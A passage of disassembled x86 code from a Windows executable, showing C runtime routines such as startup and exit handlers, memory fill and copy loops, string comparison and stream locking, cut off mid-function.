; =============== S U B	R O U T	I N E =======================================



sub_407EA6	proc near		; CODE XREF: sub_407F39+32p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		mov	esi, [esp+4+arg_0]
		xor	eax, eax
		jmp	short loc_407EBE
; ---------------------------------------------------------------------------

loc_407EAF:				; CODE XREF: sub_407EA6+1Cj
		test	eax, eax
		jnz	short loc_407EC4
		mov	ecx, [esi]
		test	ecx, ecx
		jz	short loc_407EBB
		call	ecx

loc_407EBB:				; CODE XREF: sub_407EA6+11j
		add	esi, 4

loc_407EBE:				; CODE XREF: sub_407EA6+7j
		cmp	esi, [esp+4+arg_4]
		jb	short loc_407EAF

loc_407EC4:				; CODE XREF: sub_407EA6+Bj
		pop	esi
		retn
sub_407EA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EC6	proc near		; CODE XREF: sub_405FE8+12p
					; sub_40D0D4+27p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jnz	short loc_407EEE

loc_407ED1:				; CODE XREF: sub_407EC6+2Fj
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407EEE:				; CODE XREF: sub_407EC6+9j
		mov	eax, dword_428A98
		cmp	eax, esi
		jz	short loc_407ED1
		mov	[ecx], eax
		xor	eax, eax
		pop	esi
		retn
sub_407EC6	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EFD	proc near		; CODE XREF: sub_405FE8+2Dp
					; sub_40FAE4+11Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_407F25

loc_407F08:				; CODE XREF: sub_407EFD+2Ej
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407F25:				; CODE XREF: sub_407EFD+9j
		cmp	dword_428A98, esi
		jz	short loc_407F08
		mov	ecx, dword_428AA4
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_407EFD	endp


; =============== S U B	R O U T	I N E =======================================



sub_407F39	proc near		; CODE XREF: .text:00404647p

arg_0		= dword	ptr  4

		cmp	ds:off_41FDB4, 0
		jz	short loc_407F5C
		push	offset off_41FDB4
		call	sub_40D212
		test	eax, eax
		pop	ecx
		jz	short loc_407F5C
		push	[esp+arg_0]
		call	ds:off_41FDB4
		pop	ecx

loc_407F5C:				; CODE XREF: sub_407F39+7j
					; sub_407F39+16j
		call	sub_40DB5E
		push	offset dword_41E2F8
		push	offset dword_41E2DC
		call	sub_407EA6
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short locret_407FCA
		push	esi
		push	edi
		push	offset sub_40B626
		call	sub_4033AF
		mov	esi, offset dword_41E288
		mov	eax, esi
		mov	edi, offset dword_41E2D8
		cmp	eax, edi
		pop	ecx
		jnb	short loc_407FA2

loc_407F93:				; CODE XREF: sub_407F39+67j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407F9B
		call	eax

loc_407F9B:				; CODE XREF: sub_407F39+5Ej
		add	esi, 4
		cmp	esi, edi
		jb	short loc_407F93

loc_407FA2:				; CODE XREF: sub_407F39+58j
		cmp	dword_438FF8, 0
		pop	edi
		pop	esi
		jz	short loc_407FC8
		push	offset dword_438FF8
		call	sub_40D212
		test	eax, eax
		pop	ecx
		jz	short loc_407FC8
		push	0
		push	2
		push	0
		call	dword_438FF8

loc_407FC8:				; CODE XREF: sub_407F39+72j
					; sub_407F39+81j
		xor	eax, eax

locret_407FCA:				; CODE XREF: sub_407F39+3Bj
		retn
sub_407F39	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407FCB	proc near		; CODE XREF: sub_408099+8p
					; sub_4080AA+8p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 00408093 SIZE 00000006 BYTES

		push	0Ch
		push	offset dword_422A48
		call	__SEH_prolog4
		push	8
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		xor	esi, esi
		inc	esi
		cmp	dword_428AD8, esi
		jz	short loc_408059
		mov	dword_428AD4, esi
		mov	al, byte ptr [ebp+arg_8]
		mov	byte_428AD0, al
		cmp	[ebp+arg_4], 0
		jnz	short loc_408049
		push	dword_438FF0
		call	sub_405753
		mov	edi, eax
		push	dword_438FEC
		call	sub_405753
		pop	ecx
		pop	ecx
		mov	[ebp+var_1C], eax
		test	edi, edi
		jz	short loc_408039

loc_408023:				; CODE XREF: sub_407FCB+68j
					; sub_407FCB+6Cj
		sub	[ebp+var_1C], 4
		cmp	[ebp+var_1C], edi
		jb	short loc_408039
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		test	eax, eax
		jz	short loc_408023
		call	eax
		jmp	short loc_408023
; ---------------------------------------------------------------------------

loc_408039:				; CODE XREF: sub_407FCB+56j
					; sub_407FCB+5Fj
		push	offset dword_41E308
		mov	eax, offset dword_41E2FC
		call	sub_407E8E
		pop	ecx

loc_408049:				; CODE XREF: sub_407FCB+35j
		push	offset dword_41E314
		mov	eax, offset dword_41E30C
		call	sub_407E8E
		pop	ecx

loc_408059:				; CODE XREF: sub_407FCB+21j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_408084
		cmp	[ebp+arg_8], 0
		jnz	short loc_408093
		mov	dword_428AD8, esi
		push	8
		call	sub_405EDF
		pop	ecx
		push	[ebp+arg_0]
		call	sub_407E67

loc_408081:				; DATA XREF: zcrshv4o:00422A60o
		xor	esi, esi
		inc	esi
sub_407FCB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_408084	proc near		; CODE XREF: sub_407FCB+95p
		cmp	dword ptr [ebp+10h], 0
		jz	short locret_408092
		push	8
		call	sub_405EDF
		pop	ecx

locret_408092:				; CODE XREF: sub_408084+4j
		retn
sub_408084	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_407FCB

loc_408093:				; CODE XREF: sub_407FCB+9Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_407FCB

; =============== S U B	R O U T	I N E =======================================



sub_408099	proc near		; CODE XREF: .text:00404683p

arg_0		= dword	ptr  4

		push	0
		push	0
		push	[esp+8+arg_0]
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_408099	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080AA	proc near		; CODE XREF: .text:004046B3p
					; sub_40E2E9+D9p ...

arg_0		= dword	ptr  4

		push	0
		push	1
		push	[esp+8+arg_0]
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080AA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080BB	proc near		; CODE XREF: .text:loc_404688p
		push	1
		push	0
		push	0
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080BB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080CA	proc near		; CODE XREF: .text:loc_4046B8p
		push	1
		push	1
		push	0
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080D9	proc near		; CODE XREF: sub_405A96+C4p
		push	esi
		call	sub_40574A
		mov	esi, eax
		push	esi
		call	sub_408618
		push	esi
		call	sub_40D0BA
		push	esi
		call	sub_4033C1
		push	esi
		call	sub_40E4A3
		push	esi
		call	sub_40E499
		push	esi
		call	sub_40E28F
		push	esi
		call	nullsub_464
		push	esi
		call	sub_40C49C
		push	offset sub_4080AA
		call	sub_4056E7
		add	esp, 24h
		mov	off_424930, eax
		pop	esi
		retn
sub_4080D9	endp


; =============== S U B	R O U T	I N E =======================================



sub_408125	proc near		; CODE XREF: sub_4033CB+CEp
					; sub_4034C7+18p ...
		and	dword_438FE4, 0
		retn
sub_408125	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_408130	proc near		; CODE XREF: sub_40177B+4Ap
					; sub_40177B+5Ep ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8
arg_8		= dword	ptr  0Ch

		mov	edx, [esp+arg_8]
		mov	ecx, [esp+arg_0]
		test	edx, edx
		jz	short loc_4081A5
		xor	eax, eax
		mov	al, [esp+arg_4]
		test	al, al
		jnz	short loc_40815C
		cmp	edx, 100h
		jb	short loc_40815C
		cmp	dword_437E9C, 0
		jz	short loc_40815C
		jmp	sub_40E504
; ---------------------------------------------------------------------------

loc_40815C:				; CODE XREF: sub_408130+14j
					; sub_408130+1Cj ...
		push	edi
		mov	edi, ecx
		cmp	edx, 4
		jb	short loc_408195
		neg	ecx
		and	ecx, 3
		jz	short loc_408177
		sub	edx, ecx

loc_40816D:				; CODE XREF: sub_408130+45j
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jnz	short loc_40816D

loc_408177:				; CODE XREF: sub_408130+39j
		mov	ecx, eax
		shl	eax, 8
		add	eax, ecx
		mov	ecx, eax
		shl	eax, 10h
		add	eax, ecx
		mov	ecx, edx
		and	edx, 3
		shr	ecx, 2
		jz	short loc_408195
		rep stosd
		test	edx, edx
		jz	short loc_40819F

loc_408195:				; CODE XREF: sub_408130+32j
					; sub_408130+5Dj ...
		mov	[edi], al
		add	edi, 1
		sub	edx, 1
		jnz	short loc_408195

loc_40819F:				; CODE XREF: sub_408130+63j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_4081A5:				; CODE XREF: sub_408130+Aj
		mov	eax, [esp+arg_0]
		retn
sub_408130	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4081B0	proc near		; CODE XREF: sub_403500+43p
					; sub_409398+35p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_4081D0
		cmp	edi, eax
		jb	loc_408374

loc_4081D0:				; CODE XREF: sub_4081B0+16j
		cmp	ecx, 100h
		jb	short loc_4081F7
		cmp	dword_437E9C, 0
		jz	short loc_4081F7
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_4081F7
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DE2C
; ---------------------------------------------------------------------------

loc_4081F7:				; CODE XREF: sub_4081B0+26j
					; sub_4081B0+2Fj ...
		test	edi, 3
		jnz	short loc_408214
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408214:				; CODE XREF: sub_4081B0+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_40822C
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_408234+4[eax*4]
; ---------------------------------------------------------------------------

loc_40822C:				; CODE XREF: sub_4081B0+6Ej
		jmp	dword ptr ds:loc_408334[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408234:				; CODE XREF: sub_4081B0+58j
					; sub_4081B0+B6j ...
		jmp	ds:off_4082B8[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408248
		dd offset loc_408274
		dd offset loc_408298
; ---------------------------------------------------------------------------

loc_408248:				; DATA XREF: sub_4081B0+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408274:				; DATA XREF: sub_4081B0+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408298:				; DATA XREF: sub_4081B0+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_4082B8	dd offset loc_40831B	; DATA XREF: sub_4081B0:loc_408234r
		dd offset loc_408308
		dd offset loc_408300
		dd offset loc_4082F8
		dd offset loc_4082F0
		dd offset loc_4082E8
		dd offset loc_4082E0
		dd offset loc_4082D8
; ---------------------------------------------------------------------------

loc_4082D8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_4082E0:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_4082E8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_4082F0:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_4082F8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_408300:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_408308:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_40831B:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0:off_4082B8o
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_408324	dd offset loc_408334	; DATA XREF: sub_4081B0+5Cr
					; sub_4081B0+BAr ...
		dd offset loc_40833C
		dd offset loc_408348
		dd offset loc_40835C
; ---------------------------------------------------------------------------

loc_408334:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40833C:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408348:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40835C:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408374:				; CODE XREF: sub_4081B0+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_4083A8
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_40839C:				; CODE XREF: sub_4081B0+1DDj
					; sub_4081B0+238j ...
		neg	ecx
		jmp	ds:off_408470[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4083A8:				; CODE XREF: sub_4081B0+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_4083C0
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_4083C0+4[eax*4]
; ---------------------------------------------------------------------------

loc_4083C0:				; CODE XREF: sub_4081B0+202j
					; DATA XREF: sub_4081B0+209r
		jmp	ds:off_4084C0[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		aam	83h
		inc	eax
		add	al, bh
		add	dword ptr [eax+0], 20h
		test	[eax+0], al
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		sub	esi, 2
		sub	edi, 2
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 10h
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408474
		dd offset loc_40847C
		dd offset loc_408484
		dd offset loc_40848C
		dd offset loc_408494
		dd offset loc_40849C
		dd offset loc_4084A4
off_408470	dd offset loc_4084B7	; DATA XREF: sub_4081B0+1EEr
; ---------------------------------------------------------------------------

loc_408474:				; DATA XREF: sub_4081B0+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_40847C:				; DATA XREF: sub_4081B0+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_408484:				; DATA XREF: sub_4081B0+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_40848C:				; DATA XREF: sub_4081B0+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_408494:				; DATA XREF: sub_4081B0+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_40849C:				; DATA XREF: sub_4081B0+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_4084A4:				; DATA XREF: sub_4081B0+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_4084B7:				; CODE XREF: sub_4081B0+1EEj
					; DATA XREF: sub_4081B0:off_408470o
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_4084C0	dd offset loc_4084D0	; DATA XREF: sub_4081B0+1E3r
					; sub_4081B0:loc_4083C0r ...
		dd offset loc_4084D8
		dd offset loc_4084E8
		dd offset loc_4084FC
; ---------------------------------------------------------------------------

loc_4084D0:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084D8:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084E8:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084FC:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_4081B0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408515	proc near		; CODE XREF: sub_40357B+7p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422A68
		call	__SEH_prolog4
		push	0Eh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]
		mov	ecx, [esi+4]
		test	ecx, ecx
		jz	short loc_408566
		mov	eax, dword_428AE0
		mov	edx, offset dword_428ADC

loc_408541:				; CODE XREF: sub_408515+65j
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_408559
		cmp	[eax], ecx
		jnz	short loc_408578
		mov	ecx, [eax+4]
		mov	[edx+4], ecx
		push	eax
		call	sub_403B91
		pop	ecx

loc_408559:				; CODE XREF: sub_408515+31j
		push	dword ptr [esi+4]
		call	sub_403B91
		pop	ecx
		and	dword ptr [esi+4], 0

loc_408566:				; CODE XREF: sub_408515+20j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40857C
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_408578:				; CODE XREF: sub_408515+35j
		mov	edx, eax
		jmp	short loc_408541
sub_408515	endp


; =============== S U B	R O U T	I N E =======================================



sub_40857C	proc near		; CODE XREF: sub_408515+58p
					; DATA XREF: zcrshv4o:00422A80o
		push	0Eh
		call	sub_405EDF
		pop	ecx
		retn
sub_40857C	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_408590	proc near		; CODE XREF: sub_4035A5+Cp
					; sub_40B7BC+25p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_0]
		mov	ecx, [esp+arg_4]
		test	edx, 3
		jnz	short loc_4085DC

loc_4085A0:				; CODE XREF: sub_408590+3Cj
					; sub_408590+6Aj ...
		mov	eax, [edx]
		cmp	al, [ecx]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+1]
		jnz	short loc_4085D4
		or	ah, ah
		jz	short loc_4085D0
		shr	eax, 10h
		cmp	al, [ecx+2]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+3]
		jnz	short loc_4085D4
		add	ecx, 4
		add	edx, 4
		or	ah, ah
		jnz	short loc_4085A0
		mov	edi, edi

loc_4085D0:				; CODE XREF: sub_408590+18j
					; sub_408590+21j ...
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4085D4:				; CODE XREF: sub_408590+14j
					; sub_408590+1Dj ...
		sbb	eax, eax
		shl	eax, 1
		add	eax, 1
		retn
; ---------------------------------------------------------------------------

loc_4085DC:				; CODE XREF: sub_408590+Ej
		test	edx, 1
		jz	short loc_4085FC
		mov	al, [edx]
		add	edx, 1
		cmp	al, [ecx]
		jnz	short loc_4085D4
		add	ecx, 1
		or	al, al
		jz	short loc_4085D0
		test	edx, 2
		jz	short loc_4085A0

loc_4085FC:				; CODE XREF: sub_408590+52j
		mov	ax, [edx]
		add	edx, 2
		cmp	al, [ecx]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+1]
		jnz	short loc_4085D4
		or	ah, ah
		jz	short loc_4085D0
		add	ecx, 2
		jmp	short loc_4085A0
sub_408590	endp


; =============== S U B	R O U T	I N E =======================================



sub_408618	proc near		; CODE XREF: sub_4080D9+9p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428AE4, eax
		retn
sub_408618	endp


; =============== S U B	R O U T	I N E =======================================



sub_408622	proc near		; CODE XREF: sub_4035D9+Bp
					; sub_403C6E+8Cp ...

arg_0		= dword	ptr  4

		push	dword_428AE4
		call	sub_405753
		test	eax, eax
		pop	ecx
		jz	short loc_408641
		push	[esp+arg_0]
		call	eax ; sub_41CD99
		test	eax, eax
		pop	ecx
		jz	short loc_408641
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_408641:				; CODE XREF: sub_408622+Ej
					; sub_408622+19j
		xor	eax, eax
		retn
sub_408622	endp


; =============== S U B	R O U T	I N E =======================================



sub_408644	proc near		; CODE XREF: sub_406D96+76p
					; sub_406D96+82p ...
		mov	eax, offset off_424950
		retn
sub_408644	endp


; =============== S U B	R O U T	I N E =======================================



sub_40864A	proc near		; DATA XREF: zcrshv4o:0041E2E8o
		mov	eax, dword_438FE0
		test	eax, eax
		push	esi
		push	14h
		pop	esi
		jnz	short loc_40865E
		mov	eax, 200h
		jmp	short loc_408664
; ---------------------------------------------------------------------------

loc_40865E:				; CODE XREF: sub_40864A+Bj
		cmp	eax, esi
		jge	short loc_408669
		mov	eax, esi

loc_408664:				; CODE XREF: sub_40864A+12j
		mov	dword_438FE0, eax

loc_408669:				; CODE XREF: sub_40864A+16j
		push	4
		push	eax
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_437FC0, eax
		jnz	short loc_40869A
		push	4
		push	esi
		mov	dword_438FE0, esi
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_437FC0, eax
		jnz	short loc_40869A
		push	1Ah
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40869A:				; CODE XREF: sub_40864A+30j
					; sub_40864A+49j
		xor	edx, edx
		mov	ecx, offset off_424950
		jmp	short loc_4086A8
; ---------------------------------------------------------------------------

loc_4086A3:				; CODE XREF: sub_40864A+6Dj
		mov	eax, dword_437FC0

loc_4086A8:				; CODE XREF: sub_40864A+57j
		mov	[edx+eax], ecx
		add	ecx, 20h
		add	edx, 4
		cmp	ecx, offset dword_424BD0
		jl	short loc_4086A3
		push	0FFFFFFFEh
		pop	esi
		xor	edx, edx
		mov	ecx, offset dword_424960
		push	edi

loc_4086C4:				; CODE XREF: sub_40864A+AAj
		mov	edi, edx
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, edx
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		mov	eax, [edi+eax]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4086E8
		cmp	eax, esi
		jz	short loc_4086E8
		test	eax, eax
		jnz	short loc_4086EA

loc_4086E8:				; CODE XREF: sub_40864A+94j
					; sub_40864A+98j
		mov	[ecx], esi

loc_4086EA:				; CODE XREF: sub_40864A+9Cj
		add	ecx, 20h
		inc	edx
		cmp	ecx, offset dword_4249C0
		jl	short loc_4086C4
		pop	edi
		xor	eax, eax
		pop	esi
		retn
sub_40864A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4086FB	proc near		; DATA XREF: zcrshv4o:0041E304o
		call	sub_409318
		cmp	byte_428AD0, 0
		jz	short loc_40870E
		call	sub_40E593

loc_40870E:				; CODE XREF: sub_4086FB+Cj
		push	dword_437FC0
		call	sub_403B91
		pop	ecx
		retn
sub_4086FB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40871B	proc near		; CODE XREF: sub_403795+4Fp
					; sub_403A52+50p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_424950
		cmp	eax, ecx
		jb	short loc_40873F
		cmp	eax, offset dword_424BB0
		ja	short loc_40873F
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405FB7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40873F:				; CODE XREF: sub_40871B+Bj
					; sub_40871B+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		retn
sub_40871B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40874A	proc near		; CODE XREF: sub_408A61+66p
					; sub_40923E+46p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_40875E
		add	eax, 10h
		push	eax
		call	sub_405FB7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40875E:				; CODE XREF: sub_40874A+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		retn
sub_40874A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40876D	proc near		; CODE XREF: sub_403778+3p
					; sub_4038DA+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_424950
		cmp	eax, ecx
